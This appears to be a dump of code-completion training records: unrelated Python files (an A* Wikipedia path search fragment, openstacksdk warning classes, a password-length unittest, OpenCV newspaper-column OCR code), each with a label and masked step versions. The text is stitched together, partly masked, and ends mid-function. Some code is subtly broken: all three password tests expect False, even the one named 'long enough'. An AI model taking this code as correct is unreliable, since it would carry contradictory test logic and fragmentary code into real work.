compare_titles(cur.title, target):\n nexts = cur.get_children(None)\n for next in nexts:\n if next not in visited:\n article = Article(next, target, cur, heuristic)\n 
queue.insert(article)\n visited.add(next)\n print(article.f, article.title)\n cur = queue.pop()\n print(\"CUR:\", cur.f, cur.title)\n\n path = [cur.title]\n\n while path[0] != source:\n cur = cur.parent\n path.insert(0, cur.title)\n\n return path\n\n# print(a_star(\"Dog\", \"Aardwolf\", heuristic_2))\n",
"step-ids": [
12,
15,
17,
18,
23
]
}
|
[
12,
15,
17,
18,
23
] |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
class OpenStackDeprecationWarning(DeprecationWarning):
"""Base class for warnings about deprecated features in openstacksdk."""
class RemovedResourceWarning(OpenStackDeprecationWarning):
"""Indicates that a resource has been removed in newer API versions and
should not be used.
"""
class RemovedFieldWarning(OpenStackDeprecationWarning):
"""Indicates that a field has been removed in newer API versions and should
not be used.
"""
class LegacyAPIWarning(OpenStackDeprecationWarning):
"""Indicates an API that is in 'legacy' status, a long term deprecation."""
class OpenStackWarning(Warning):
"""Base class for general warnings in openstacksdk."""
class ConfigurationWarning(OpenStackWarning):
"""Indicates an issue with configuration."""
class UnsupportedServiceVersion(OpenStackWarning):
"""Indicates a major version that SDK doesn't understand."""
|
normal
|
{
"blob_id": "6339a1a06319a748030b3411c7a8d00f36336e65",
"index": 9778,
"step-1": "<mask token>\n\n\nclass RemovedResourceWarning(OpenStackDeprecationWarning):\n <mask token>\n\n\nclass RemovedFieldWarning(OpenStackDeprecationWarning):\n \"\"\"Indicates that a field has been removed in newer API versions and should\n not be used.\n \"\"\"\n\n\nclass LegacyAPIWarning(OpenStackDeprecationWarning):\n \"\"\"Indicates an API that is in 'legacy' status, a long term deprecation.\"\"\"\n\n\nclass OpenStackWarning(Warning):\n \"\"\"Base class for general warnings in openstacksdk.\"\"\"\n\n\nclass ConfigurationWarning(OpenStackWarning):\n \"\"\"Indicates an issue with configuration.\"\"\"\n\n\nclass UnsupportedServiceVersion(OpenStackWarning):\n \"\"\"Indicates a major version that SDK doesn't understand.\"\"\"\n",
"step-2": "<mask token>\n\n\nclass RemovedResourceWarning(OpenStackDeprecationWarning):\n \"\"\"Indicates that a resource has been removed in newer API versions and\n should not be used.\n \"\"\"\n\n\nclass RemovedFieldWarning(OpenStackDeprecationWarning):\n \"\"\"Indicates that a field has been removed in newer API versions and should\n not be used.\n \"\"\"\n\n\nclass LegacyAPIWarning(OpenStackDeprecationWarning):\n \"\"\"Indicates an API that is in 'legacy' status, a long term deprecation.\"\"\"\n\n\nclass OpenStackWarning(Warning):\n \"\"\"Base class for general warnings in openstacksdk.\"\"\"\n\n\nclass ConfigurationWarning(OpenStackWarning):\n \"\"\"Indicates an issue with configuration.\"\"\"\n\n\nclass UnsupportedServiceVersion(OpenStackWarning):\n \"\"\"Indicates a major version that SDK doesn't understand.\"\"\"\n",
"step-3": "class OpenStackDeprecationWarning(DeprecationWarning):\n <mask token>\n\n\nclass RemovedResourceWarning(OpenStackDeprecationWarning):\n \"\"\"Indicates that a resource has been removed in newer API versions and\n should not be used.\n \"\"\"\n\n\nclass RemovedFieldWarning(OpenStackDeprecationWarning):\n \"\"\"Indicates that a field has been removed in newer API versions and should\n not be used.\n \"\"\"\n\n\nclass LegacyAPIWarning(OpenStackDeprecationWarning):\n \"\"\"Indicates an API that is in 'legacy' status, a long term deprecation.\"\"\"\n\n\nclass OpenStackWarning(Warning):\n \"\"\"Base class for general warnings in openstacksdk.\"\"\"\n\n\nclass ConfigurationWarning(OpenStackWarning):\n \"\"\"Indicates an issue with configuration.\"\"\"\n\n\nclass UnsupportedServiceVersion(OpenStackWarning):\n \"\"\"Indicates a major version that SDK doesn't understand.\"\"\"\n",
"step-4": "class OpenStackDeprecationWarning(DeprecationWarning):\n \"\"\"Base class for warnings about deprecated features in openstacksdk.\"\"\"\n\n\nclass RemovedResourceWarning(OpenStackDeprecationWarning):\n \"\"\"Indicates that a resource has been removed in newer API versions and\n should not be used.\n \"\"\"\n\n\nclass RemovedFieldWarning(OpenStackDeprecationWarning):\n \"\"\"Indicates that a field has been removed in newer API versions and should\n not be used.\n \"\"\"\n\n\nclass LegacyAPIWarning(OpenStackDeprecationWarning):\n \"\"\"Indicates an API that is in 'legacy' status, a long term deprecation.\"\"\"\n\n\nclass OpenStackWarning(Warning):\n \"\"\"Base class for general warnings in openstacksdk.\"\"\"\n\n\nclass ConfigurationWarning(OpenStackWarning):\n \"\"\"Indicates an issue with configuration.\"\"\"\n\n\nclass UnsupportedServiceVersion(OpenStackWarning):\n \"\"\"Indicates a major version that SDK doesn't understand.\"\"\"\n",
"step-5": "# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nclass OpenStackDeprecationWarning(DeprecationWarning):\n \"\"\"Base class for warnings about deprecated features in openstacksdk.\"\"\"\n\n\nclass RemovedResourceWarning(OpenStackDeprecationWarning):\n \"\"\"Indicates that a resource has been removed in newer API versions and\n should not be used.\n \"\"\"\n\n\nclass RemovedFieldWarning(OpenStackDeprecationWarning):\n \"\"\"Indicates that a field has been removed in newer API versions and should\n not be used.\n \"\"\"\n\n\nclass LegacyAPIWarning(OpenStackDeprecationWarning):\n \"\"\"Indicates an API that is in 'legacy' status, a long term deprecation.\"\"\"\n\n\nclass OpenStackWarning(Warning):\n \"\"\"Base class for general warnings in openstacksdk.\"\"\"\n\n\nclass ConfigurationWarning(OpenStackWarning):\n \"\"\"Indicates an issue with configuration.\"\"\"\n\n\nclass UnsupportedServiceVersion(OpenStackWarning):\n \"\"\"Indicates a major version that SDK doesn't understand.\"\"\"\n",
"step-ids": [
11,
12,
13,
14,
15
]
}
|
[
11,
12,
13,
14,
15
] |
import unittest
from validate_pw_complexity import *
class Test_PW_Functions(unittest.TestCase):
def test_pw_not_long_enough_min(self):
sample_pass ="abcd"
expected_result = False
result = validate_pw_long(sample_pass)
self.assertEqual(expected_result, result)
def test_pw_just_long_enough_min(self):
sample_pass = "abcdadca"
expected_result = False
result = validate_pw_long(sample_pass)
self.assertEqual(expected_result, result)
def test_pw_long_enough_min(self):
sample_pass = "abcdadcaabc"
expected_result = False
result = validate_pw_long(sample_pass)
self.assertEqual(expected_result, result)
|
normal
|
{
"blob_id": "dc7d75bf43f1ba55673a43f863dd08e99a1c0e0f",
"index": 4820,
"step-1": "<mask token>\n\n\nclass Test_PW_Functions(unittest.TestCase):\n <mask token>\n <mask token>\n\n def test_pw_long_enough_min(self):\n sample_pass = 'abcdadcaabc'\n expected_result = False\n result = validate_pw_long(sample_pass)\n self.assertEqual(expected_result, result)\n",
"step-2": "<mask token>\n\n\nclass Test_PW_Functions(unittest.TestCase):\n\n def test_pw_not_long_enough_min(self):\n sample_pass = 'abcd'\n expected_result = False\n result = validate_pw_long(sample_pass)\n self.assertEqual(expected_result, result)\n <mask token>\n\n def test_pw_long_enough_min(self):\n sample_pass = 'abcdadcaabc'\n expected_result = False\n result = validate_pw_long(sample_pass)\n self.assertEqual(expected_result, result)\n",
"step-3": "<mask token>\n\n\nclass Test_PW_Functions(unittest.TestCase):\n\n def test_pw_not_long_enough_min(self):\n sample_pass = 'abcd'\n expected_result = False\n result = validate_pw_long(sample_pass)\n self.assertEqual(expected_result, result)\n\n def test_pw_just_long_enough_min(self):\n sample_pass = 'abcdadca'\n expected_result = False\n result = validate_pw_long(sample_pass)\n self.assertEqual(expected_result, result)\n\n def test_pw_long_enough_min(self):\n sample_pass = 'abcdadcaabc'\n expected_result = False\n result = validate_pw_long(sample_pass)\n self.assertEqual(expected_result, result)\n",
"step-4": "import unittest\nfrom validate_pw_complexity import *\n\n\nclass Test_PW_Functions(unittest.TestCase):\n\n def test_pw_not_long_enough_min(self):\n sample_pass = 'abcd'\n expected_result = False\n result = validate_pw_long(sample_pass)\n self.assertEqual(expected_result, result)\n\n def test_pw_just_long_enough_min(self):\n sample_pass = 'abcdadca'\n expected_result = False\n result = validate_pw_long(sample_pass)\n self.assertEqual(expected_result, result)\n\n def test_pw_long_enough_min(self):\n sample_pass = 'abcdadcaabc'\n expected_result = False\n result = validate_pw_long(sample_pass)\n self.assertEqual(expected_result, result)\n",
"step-5": "import unittest\n\nfrom validate_pw_complexity import *\n\nclass Test_PW_Functions(unittest.TestCase):\n\n def test_pw_not_long_enough_min(self):\n sample_pass =\"abcd\"\n expected_result = False\n\n result = validate_pw_long(sample_pass)\n self.assertEqual(expected_result, result)\n\n def test_pw_just_long_enough_min(self):\n sample_pass = \"abcdadca\"\n expected_result = False\n\n result = validate_pw_long(sample_pass)\n self.assertEqual(expected_result, result)\n\n def test_pw_long_enough_min(self):\n sample_pass = \"abcdadcaabc\"\n expected_result = False\n\n result = validate_pw_long(sample_pass)\n self.assertEqual(expected_result, result)\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
def adaptative_thresholding(img, threshold):
I = img
gray = cv2.cvtColor(I, cv2.COLOR_BGR2GRAY)
orignrows, origncols = gray.shape
M = int(np.floor(orignrows / 16) + 1)
N = int(np.floor(origncols / 16) + 1)
Mextend = round(M / 2) - 1
Nextend = round(N / 2) - 1
aux = cv2.copyMakeBorder(gray, top=Mextend, bottom=Mextend, left=
Nextend, right=Nextend, borderType=cv2.BORDER_REFLECT)
windows = np.zeros((M, N), np.int32)
imageIntegral = cv2.integral(aux, windows, -1)
nrows, ncols = imageIntegral.shape
result = np.zeros((orignrows, origncols))
for i in range(nrows - M):
for j in range(ncols - N):
result[i, j] = imageIntegral[i + M, j + N] - imageIntegral[i, j + N
] + imageIntegral[i, j] - imageIntegral[i + M, j]
binar = np.ones((orignrows, origncols), dtype=np.bool)
graymult = gray.astype('float64') * M * N
binar[graymult <= result * (100.0 - threshold) / 100.0] = False
binar = (255 * binar).astype(np.uint8)
return binar
<|reserved_special_token_0|>
def convertToGrayscale(img):
temp_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
return temp_img
def invert(img):
""" Black -> White | White -> Black """
print('invert image')
_, temp_img = cv2.threshold(img, 140, 255, cv2.THRESH_BINARY_INV)
return temp_img
def dilateDirection(img, debug=False):
"""
It is just opposite of erosion. Here, a pixel element is '1' if atleast one pixel under the kernel is '1'.
So it increases the white region in the image or size of foreground object increases.
Normally, in cases like noise removal, erosion is followed by dilation.
Because, erosion removes white noises, but it also shrinks our object.
So we dilate it. Since noise is gone, they won't come back, but our object area increases.
It is also useful in joining broken parts of an object.
"""
print('applying dilation morph')
temp_img = cv2.dilate(img, DILATE_KERNEL, iterations=15)
"""
if debug:
filepath = os.path.join(debugOutputDirectory, '%s-dilation.tiff' % basename)
cv2.imwrite(filepath, temp_img)
"""
return temp_img
def createColumnImages(img, basename, directory):
"""
we sum each column of the inverted image. The columns should show up as peaks in the sums
uses scipy.signal.find_peaks to find those peaks and use them as column indexes
"""
files = []
temp_img = convertToGrayscale(img)
temp_img = invert(temp_img)
temp_img = dilateDirection(temp_img)
sums = np.sum(temp_img, axis=COLUMNS)
sums[0] = 1000
sums = sums * -4
peaks, _ = find_peaks(sums, distance=600)
sum_to_index = dict((sums[peaks[i]], peaks[i]) for i in range(len(peaks)))
sorted_sums = sorted(sum_to_index.keys())
"""
qr = Q_test(sorted_sums)
if qr:
peaks = peaks[peaks != sum_to_index[sorted_sums[0]]]
"""
print('PeakNum, Sum, QRemove for ' + basename)
for x in peaks:
print(str(x) + ', ' + str(sums[x]))
print('----------')
if peaks.size == 0:
with open('troublesomeImages.txt', 'a') as f:
print(
'ERROR: something went wrong with finding the peaks for image: '
, os.path.join(directory, basename))
f.write(os.path.join(directory, basename) + '.jpg 0\n')
return files
peaks[0] = 0
peaks[-1] = sums.size - 1
boxed = np.copy(img)
if peaks.size < 6:
with open('troublesomeImages.txt', 'a') as f:
print('found image that is causing problems: ', os.path.join(
directory, basename))
f.write(os.path.join(directory, basename) + '.jpg ' + str(peaks
.size) + '\n')
columnIndexPairs = columnIndexes(peaks)
ystart = 0
yend = img.shape[0]
for columnIndexPair in columnIndexPairs:
xstart = max(columnIndexPair[0] - PADDING, 0)
xend = min(columnIndexPair[1] + PADDING, img.shape[1])
if not os.path.exists(directory):
os.makedirs(directory)
filepath = os.path.join(directory, '%s_xStart%s_xEnd%s.jpg' % (
basename, xstart, xend))
files.append(filepath)
crop_img = img[ystart:yend, xstart:xend]
print('writing out cropped image: ', filepath)
if not cv2.imwrite(filepath, crop_img):
print('failed')
if CREATE_COLUMN_OUTLINE_IMAGES:
cv2.rectangle(boxed, (xstart, ystart), (xend, yend), GREEN,
LINE_THICKNESS)
if CREATE_COLUMN_OUTLINE_IMAGES:
filepath = os.path.join(directory, '%s-contours.jpeg' % basename)
cv2.imwrite(filepath, boxed, [cv2.IMWRITE_JPEG_QUALITY, 50])
return files
<|reserved_special_token_0|>
def test(img, basename):
test_img = convertToGrayscale(img)
test_img = invert(test_img)
test_img = dilateDirection(test_img)
cv2.imwrite('./ocr/test_images/contours/' + basename + 'dilated.jpg',
test_img)
"""
for r in range(0, 40, 5):
name = 'rank=' + str(r) + ".jpg"
path = './ocr/test_images/' + name
new_img = ndimage.rank_filter(test_img, rank=r, size=20)
print("writing " + name)
cv2.imwrite(path, new_img)
"""
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def adaptative_thresholding(img, threshold):
I = img
gray = cv2.cvtColor(I, cv2.COLOR_BGR2GRAY)
orignrows, origncols = gray.shape
M = int(np.floor(orignrows / 16) + 1)
N = int(np.floor(origncols / 16) + 1)
Mextend = round(M / 2) - 1
Nextend = round(N / 2) - 1
aux = cv2.copyMakeBorder(gray, top=Mextend, bottom=Mextend, left=
Nextend, right=Nextend, borderType=cv2.BORDER_REFLECT)
windows = np.zeros((M, N), np.int32)
imageIntegral = cv2.integral(aux, windows, -1)
nrows, ncols = imageIntegral.shape
result = np.zeros((orignrows, origncols))
for i in range(nrows - M):
for j in range(ncols - N):
result[i, j] = imageIntegral[i + M, j + N] - imageIntegral[i, j + N
] + imageIntegral[i, j] - imageIntegral[i + M, j]
binar = np.ones((orignrows, origncols), dtype=np.bool)
graymult = gray.astype('float64') * M * N
binar[graymult <= result * (100.0 - threshold) / 100.0] = False
binar = (255 * binar).astype(np.uint8)
return binar
<|reserved_special_token_0|>
def convertToGrayscale(img):
temp_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
return temp_img
def invert(img):
""" Black -> White | White -> Black """
print('invert image')
_, temp_img = cv2.threshold(img, 140, 255, cv2.THRESH_BINARY_INV)
return temp_img
def dilateDirection(img, debug=False):
"""
It is just opposite of erosion. Here, a pixel element is '1' if atleast one pixel under the kernel is '1'.
So it increases the white region in the image or size of foreground object increases.
Normally, in cases like noise removal, erosion is followed by dilation.
Because, erosion removes white noises, but it also shrinks our object.
So we dilate it. Since noise is gone, they won't come back, but our object area increases.
It is also useful in joining broken parts of an object.
"""
print('applying dilation morph')
temp_img = cv2.dilate(img, DILATE_KERNEL, iterations=15)
"""
if debug:
filepath = os.path.join(debugOutputDirectory, '%s-dilation.tiff' % basename)
cv2.imwrite(filepath, temp_img)
"""
return temp_img
def createColumnImages(img, basename, directory):
"""
we sum each column of the inverted image. The columns should show up as peaks in the sums
uses scipy.signal.find_peaks to find those peaks and use them as column indexes
"""
files = []
temp_img = convertToGrayscale(img)
temp_img = invert(temp_img)
temp_img = dilateDirection(temp_img)
sums = np.sum(temp_img, axis=COLUMNS)
sums[0] = 1000
sums = sums * -4
peaks, _ = find_peaks(sums, distance=600)
sum_to_index = dict((sums[peaks[i]], peaks[i]) for i in range(len(peaks)))
sorted_sums = sorted(sum_to_index.keys())
"""
qr = Q_test(sorted_sums)
if qr:
peaks = peaks[peaks != sum_to_index[sorted_sums[0]]]
"""
print('PeakNum, Sum, QRemove for ' + basename)
for x in peaks:
print(str(x) + ', ' + str(sums[x]))
print('----------')
if peaks.size == 0:
with open('troublesomeImages.txt', 'a') as f:
print(
'ERROR: something went wrong with finding the peaks for image: '
, os.path.join(directory, basename))
f.write(os.path.join(directory, basename) + '.jpg 0\n')
return files
peaks[0] = 0
peaks[-1] = sums.size - 1
boxed = np.copy(img)
if peaks.size < 6:
with open('troublesomeImages.txt', 'a') as f:
print('found image that is causing problems: ', os.path.join(
directory, basename))
f.write(os.path.join(directory, basename) + '.jpg ' + str(peaks
.size) + '\n')
columnIndexPairs = columnIndexes(peaks)
ystart = 0
yend = img.shape[0]
for columnIndexPair in columnIndexPairs:
xstart = max(columnIndexPair[0] - PADDING, 0)
xend = min(columnIndexPair[1] + PADDING, img.shape[1])
if not os.path.exists(directory):
os.makedirs(directory)
filepath = os.path.join(directory, '%s_xStart%s_xEnd%s.jpg' % (
basename, xstart, xend))
files.append(filepath)
crop_img = img[ystart:yend, xstart:xend]
print('writing out cropped image: ', filepath)
if not cv2.imwrite(filepath, crop_img):
print('failed')
if CREATE_COLUMN_OUTLINE_IMAGES:
cv2.rectangle(boxed, (xstart, ystart), (xend, yend), GREEN,
LINE_THICKNESS)
if CREATE_COLUMN_OUTLINE_IMAGES:
filepath = os.path.join(directory, '%s-contours.jpeg' % basename)
cv2.imwrite(filepath, boxed, [cv2.IMWRITE_JPEG_QUALITY, 50])
return files
def invert_experiment():
test_img = cv2.imread(
'./ocr/data/8k71pf94q/1_commonwealth_8k71pf94q_accessFull.jpg')
for thresh in range(1, 200, 20):
print('writing thresh= ' + str(thresh))
_, temp_img = cv2.threshold(test_img, thresh, 255, cv2.
THRESH_BINARY_INV)
cv2.imwrite('./ocr/test_images/thresh=' + str(thresh) + '.jpg',
temp_img)
def test(img, basename):
test_img = convertToGrayscale(img)
test_img = invert(test_img)
test_img = dilateDirection(test_img)
cv2.imwrite('./ocr/test_images/contours/' + basename + 'dilated.jpg',
test_img)
"""
for r in range(0, 40, 5):
name = 'rank=' + str(r) + ".jpg"
path = './ocr/test_images/' + name
new_img = ndimage.rank_filter(test_img, rank=r, size=20)
print("writing " + name)
cv2.imwrite(path, new_img)
"""
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def adaptative_thresholding(img, threshold):
I = img
gray = cv2.cvtColor(I, cv2.COLOR_BGR2GRAY)
orignrows, origncols = gray.shape
M = int(np.floor(orignrows / 16) + 1)
N = int(np.floor(origncols / 16) + 1)
Mextend = round(M / 2) - 1
Nextend = round(N / 2) - 1
aux = cv2.copyMakeBorder(gray, top=Mextend, bottom=Mextend, left=
Nextend, right=Nextend, borderType=cv2.BORDER_REFLECT)
windows = np.zeros((M, N), np.int32)
imageIntegral = cv2.integral(aux, windows, -1)
nrows, ncols = imageIntegral.shape
result = np.zeros((orignrows, origncols))
for i in range(nrows - M):
for j in range(ncols - N):
result[i, j] = imageIntegral[i + M, j + N] - imageIntegral[i, j + N
] + imageIntegral[i, j] - imageIntegral[i + M, j]
binar = np.ones((orignrows, origncols), dtype=np.bool)
graymult = gray.astype('float64') * M * N
binar[graymult <= result * (100.0 - threshold) / 100.0] = False
binar = (255 * binar).astype(np.uint8)
return binar
<|reserved_special_token_0|>
def columnIndexes(a):
"""
creates pair of indexes for left and right index of the image column
For example [13, 1257, 2474, 3695, 4907, 6149]
becomes: [[13 1257], [1257 2474], [2474 3695], [3695 4907], [4907 6149]]
"""
nrows = a.size - 2 + 1
return a[1 * np.arange(nrows)[:, None] + np.arange(2)]
def convertToGrayscale(img):
temp_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
return temp_img
def invert(img):
""" Black -> White | White -> Black """
print('invert image')
_, temp_img = cv2.threshold(img, 140, 255, cv2.THRESH_BINARY_INV)
return temp_img
def dilateDirection(img, debug=False):
"""
It is just opposite of erosion. Here, a pixel element is '1' if atleast one pixel under the kernel is '1'.
So it increases the white region in the image or size of foreground object increases.
Normally, in cases like noise removal, erosion is followed by dilation.
Because, erosion removes white noises, but it also shrinks our object.
So we dilate it. Since noise is gone, they won't come back, but our object area increases.
It is also useful in joining broken parts of an object.
"""
print('applying dilation morph')
temp_img = cv2.dilate(img, DILATE_KERNEL, iterations=15)
"""
if debug:
filepath = os.path.join(debugOutputDirectory, '%s-dilation.tiff' % basename)
cv2.imwrite(filepath, temp_img)
"""
return temp_img
def createColumnImages(img, basename, directory):
"""
we sum each column of the inverted image. The columns should show up as peaks in the sums
uses scipy.signal.find_peaks to find those peaks and use them as column indexes
"""
files = []
temp_img = convertToGrayscale(img)
temp_img = invert(temp_img)
temp_img = dilateDirection(temp_img)
sums = np.sum(temp_img, axis=COLUMNS)
sums[0] = 1000
sums = sums * -4
peaks, _ = find_peaks(sums, distance=600)
sum_to_index = dict((sums[peaks[i]], peaks[i]) for i in range(len(peaks)))
sorted_sums = sorted(sum_to_index.keys())
"""
qr = Q_test(sorted_sums)
if qr:
peaks = peaks[peaks != sum_to_index[sorted_sums[0]]]
"""
print('PeakNum, Sum, QRemove for ' + basename)
for x in peaks:
print(str(x) + ', ' + str(sums[x]))
print('----------')
if peaks.size == 0:
with open('troublesomeImages.txt', 'a') as f:
print(
'ERROR: something went wrong with finding the peaks for image: '
, os.path.join(directory, basename))
f.write(os.path.join(directory, basename) + '.jpg 0\n')
return files
peaks[0] = 0
peaks[-1] = sums.size - 1
boxed = np.copy(img)
if peaks.size < 6:
with open('troublesomeImages.txt', 'a') as f:
print('found image that is causing problems: ', os.path.join(
directory, basename))
f.write(os.path.join(directory, basename) + '.jpg ' + str(peaks
.size) + '\n')
columnIndexPairs = columnIndexes(peaks)
ystart = 0
yend = img.shape[0]
for columnIndexPair in columnIndexPairs:
xstart = max(columnIndexPair[0] - PADDING, 0)
xend = min(columnIndexPair[1] + PADDING, img.shape[1])
if not os.path.exists(directory):
os.makedirs(directory)
filepath = os.path.join(directory, '%s_xStart%s_xEnd%s.jpg' % (
basename, xstart, xend))
files.append(filepath)
crop_img = img[ystart:yend, xstart:xend]
print('writing out cropped image: ', filepath)
if not cv2.imwrite(filepath, crop_img):
print('failed')
if CREATE_COLUMN_OUTLINE_IMAGES:
cv2.rectangle(boxed, (xstart, ystart), (xend, yend), GREEN,
LINE_THICKNESS)
if CREATE_COLUMN_OUTLINE_IMAGES:
filepath = os.path.join(directory, '%s-contours.jpeg' % basename)
cv2.imwrite(filepath, boxed, [cv2.IMWRITE_JPEG_QUALITY, 50])
return files
def invert_experiment():
test_img = cv2.imread(
'./ocr/data/8k71pf94q/1_commonwealth_8k71pf94q_accessFull.jpg')
for thresh in range(1, 200, 20):
print('writing thresh= ' + str(thresh))
_, temp_img = cv2.threshold(test_img, thresh, 255, cv2.
THRESH_BINARY_INV)
cv2.imwrite('./ocr/test_images/thresh=' + str(thresh) + '.jpg',
temp_img)
def test(img, basename):
test_img = convertToGrayscale(img)
test_img = invert(test_img)
test_img = dilateDirection(test_img)
cv2.imwrite('./ocr/test_images/contours/' + basename + 'dilated.jpg',
test_img)
"""
for r in range(0, 40, 5):
name = 'rank=' + str(r) + ".jpg"
path = './ocr/test_images/' + name
new_img = ndimage.rank_filter(test_img, rank=r, size=20)
print("writing " + name)
cv2.imwrite(path, new_img)
"""
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
os.environ['OPENCV_IO_ENABLE_JASPER'] = 'True'
<|reserved_special_token_0|>
DILATE_KERNEL = np.array([[0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0,
0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0,
0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0,
0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0]], dtype
=np.uint8)
def adaptative_thresholding(img, threshold):
I = img
gray = cv2.cvtColor(I, cv2.COLOR_BGR2GRAY)
orignrows, origncols = gray.shape
M = int(np.floor(orignrows / 16) + 1)
N = int(np.floor(origncols / 16) + 1)
Mextend = round(M / 2) - 1
Nextend = round(N / 2) - 1
aux = cv2.copyMakeBorder(gray, top=Mextend, bottom=Mextend, left=
Nextend, right=Nextend, borderType=cv2.BORDER_REFLECT)
windows = np.zeros((M, N), np.int32)
imageIntegral = cv2.integral(aux, windows, -1)
nrows, ncols = imageIntegral.shape
result = np.zeros((orignrows, origncols))
for i in range(nrows - M):
for j in range(ncols - N):
result[i, j] = imageIntegral[i + M, j + N] - imageIntegral[i, j + N
] + imageIntegral[i, j] - imageIntegral[i + M, j]
binar = np.ones((orignrows, origncols), dtype=np.bool)
graymult = gray.astype('float64') * M * N
binar[graymult <= result * (100.0 - threshold) / 100.0] = False
binar = (255 * binar).astype(np.uint8)
return binar
def Q_test(sorted_data):
conf95_level = {(3): 0.97, (4): 0.829, (5): 0.71, (6): 0.625, (7):
0.568, (8): 0.526, (9): 0.493}
q_exp = abs(sorted_data[1] - sorted_data[0]) / abs(sorted_data[-1] -
sorted_data[0])
print(str(abs(sorted_data[1] - sorted_data[0])) + ' / ' + str(abs(
sorted_data[-1] - sorted_data[0])))
print('q_exp : ' + str(q_exp))
return q_exp > conf95_level[min(9, len(sorted_data))]
COLUMNS = 0
GREEN = 0, 255, 0
LINE_THICKNESS = 3
PADDING = 10
CREATE_COLUMN_OUTLINE_IMAGES = True
def columnIndexes(a):
"""
creates pair of indexes for left and right index of the image column
For example [13, 1257, 2474, 3695, 4907, 6149]
becomes: [[13 1257], [1257 2474], [2474 3695], [3695 4907], [4907 6149]]
"""
nrows = a.size - 2 + 1
return a[1 * np.arange(nrows)[:, None] + np.arange(2)]
def convertToGrayscale(img):
temp_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
return temp_img
def invert(img):
""" Black -> White | White -> Black """
print('invert image')
_, temp_img = cv2.threshold(img, 140, 255, cv2.THRESH_BINARY_INV)
return temp_img
def dilateDirection(img, debug=False):
"""
It is just opposite of erosion. Here, a pixel element is '1' if atleast one pixel under the kernel is '1'.
So it increases the white region in the image or size of foreground object increases.
Normally, in cases like noise removal, erosion is followed by dilation.
Because, erosion removes white noises, but it also shrinks our object.
So we dilate it. Since noise is gone, they won't come back, but our object area increases.
It is also useful in joining broken parts of an object.
"""
print('applying dilation morph')
temp_img = cv2.dilate(img, DILATE_KERNEL, iterations=15)
"""
if debug:
filepath = os.path.join(debugOutputDirectory, '%s-dilation.tiff' % basename)
cv2.imwrite(filepath, temp_img)
"""
return temp_img
def createColumnImages(img, basename, directory):
"""
we sum each column of the inverted image. The columns should show up as peaks in the sums
uses scipy.signal.find_peaks to find those peaks and use them as column indexes
"""
files = []
temp_img = convertToGrayscale(img)
temp_img = invert(temp_img)
temp_img = dilateDirection(temp_img)
sums = np.sum(temp_img, axis=COLUMNS)
sums[0] = 1000
sums = sums * -4
peaks, _ = find_peaks(sums, distance=600)
sum_to_index = dict((sums[peaks[i]], peaks[i]) for i in range(len(peaks)))
sorted_sums = sorted(sum_to_index.keys())
"""
qr = Q_test(sorted_sums)
if qr:
peaks = peaks[peaks != sum_to_index[sorted_sums[0]]]
"""
print('PeakNum, Sum, QRemove for ' + basename)
for x in peaks:
print(str(x) + ', ' + str(sums[x]))
print('----------')
if peaks.size == 0:
with open('troublesomeImages.txt', 'a') as f:
print(
'ERROR: something went wrong with finding the peaks for image: '
, os.path.join(directory, basename))
f.write(os.path.join(directory, basename) + '.jpg 0\n')
return files
peaks[0] = 0
peaks[-1] = sums.size - 1
boxed = np.copy(img)
if peaks.size < 6:
with open('troublesomeImages.txt', 'a') as f:
print('found image that is causing problems: ', os.path.join(
directory, basename))
f.write(os.path.join(directory, basename) + '.jpg ' + str(peaks
.size) + '\n')
columnIndexPairs = columnIndexes(peaks)
ystart = 0
yend = img.shape[0]
for columnIndexPair in columnIndexPairs:
xstart = max(columnIndexPair[0] - PADDING, 0)
xend = min(columnIndexPair[1] + PADDING, img.shape[1])
if not os.path.exists(directory):
os.makedirs(directory)
filepath = os.path.join(directory, '%s_xStart%s_xEnd%s.jpg' % (
basename, xstart, xend))
files.append(filepath)
crop_img = img[ystart:yend, xstart:xend]
print('writing out cropped image: ', filepath)
if not cv2.imwrite(filepath, crop_img):
print('failed')
if CREATE_COLUMN_OUTLINE_IMAGES:
cv2.rectangle(boxed, (xstart, ystart), (xend, yend), GREEN,
LINE_THICKNESS)
if CREATE_COLUMN_OUTLINE_IMAGES:
filepath = os.path.join(directory, '%s-contours.jpeg' % basename)
cv2.imwrite(filepath, boxed, [cv2.IMWRITE_JPEG_QUALITY, 50])
return files
def invert_experiment():
test_img = cv2.imread(
'./ocr/data/8k71pf94q/1_commonwealth_8k71pf94q_accessFull.jpg')
for thresh in range(1, 200, 20):
print('writing thresh= ' + str(thresh))
_, temp_img = cv2.threshold(test_img, thresh, 255, cv2.
THRESH_BINARY_INV)
cv2.imwrite('./ocr/test_images/thresh=' + str(thresh) + '.jpg',
temp_img)
def test(img, basename):
test_img = convertToGrayscale(img)
test_img = invert(test_img)
test_img = dilateDirection(test_img)
